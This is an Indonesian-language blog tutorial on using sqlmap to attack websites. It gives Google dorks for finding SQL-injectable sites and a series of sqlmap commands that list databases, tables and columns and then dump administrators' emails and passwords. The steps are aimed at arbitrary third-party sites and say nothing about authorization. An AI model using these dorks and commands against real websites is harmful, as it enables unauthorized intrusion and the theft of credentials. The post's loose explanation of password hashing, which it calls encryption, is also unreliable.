Cara Menggunakan SqlMap


Hallo, 
Pada malam hari ini saya ingin memberikan tutorial Menggunakan SqlMap. Di artikel sebelumnya saya telah menulis Tutorial Menginstall SqlMap Di Termux.

Oke lanjut ke tutorialnya.

Mencari Target

Seperti biasa, Step yang pertama adalah mencari target yang vuln terhadap SQL Injection. Kalian bisa menggunakan dork yang biasanya saya gunakan.

DORK:
  • inurl:/blog.php?id=
  • inurl:/views.php?id=
  • inurl:/news.php?id=
  • inurl:/berita.php?id=
Kembangkan lagi ya biar dapat yang fresh.

Ciri-Ciri Target Vuln

Nah website yang vuln terhadap SQL Injection biasanya memiliki ciri seperti ini.
  • Gambar rusak
  • Konten hilang sebagian
  • Muncul Path (ex:Fatal error: Call to a member function fetch_assoc() on boolean in /home/user/public_html/viewblog.php on line 59)
  • Muncul pesan error (ex:Invalid syntax blablabla)
  • Dan masih banyak lagi.
Nah itulah ciri-ciri website yang vuln SQL Injection.

Injeksi SQL Menggunakan SqlMap

Setelah mendapatkan target yang vuln tinggal eksekusi aja deh di SqlMap.

Untuk cara eksekusinya gampang, tinggal masukkan command: python2 sqlmap.py -u "https://localhost.com/param.php?id=1337" --dbs


Yapss, database website target muncul disitu. Kalo mau dump email dan password adminnya maka tinggal masukkan command: python2 sqlmap.py -u "https://localhost.com/param.php?id=1337" -D nama_database_target --tables


Yapss table berhasil kedump, tinggal dump column aja buat dapetin email dan password adminnya. Untuk dump column masukkan command: python2 sqlmap.py -u "https://localhost.com/param.php?id=1337" -D nama_database_target -T nama_table_yang_ingin_di_dump --column


Tinggal dump deh isi dalam columnnya, disini saya akan dump email dan password. Cara dumpnya cukup mudah hanya perlu memasukkan command: python2 sqlmap.py -u "https://localhost.com/param.php?id=1337" -D nama_database_target -T nama_tabel_yang_ingin_di_dump -C email,password --dump


Yuhuu email dan password berhasil didump, Namun hash passwordnya ini kayak bcrypt susah untuk didecrypt karna ini type satu jalur (udah di encrypt nggak bisa di decrypt, pokoknya gitu lah).

Akhir Kata

Mungkin cukup sampai disini aja artikel tentang "Cara Menggunakan SqlMap".
Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi.

Sampai jumpa di artikel selanjutnya, Semoga bermanfaat!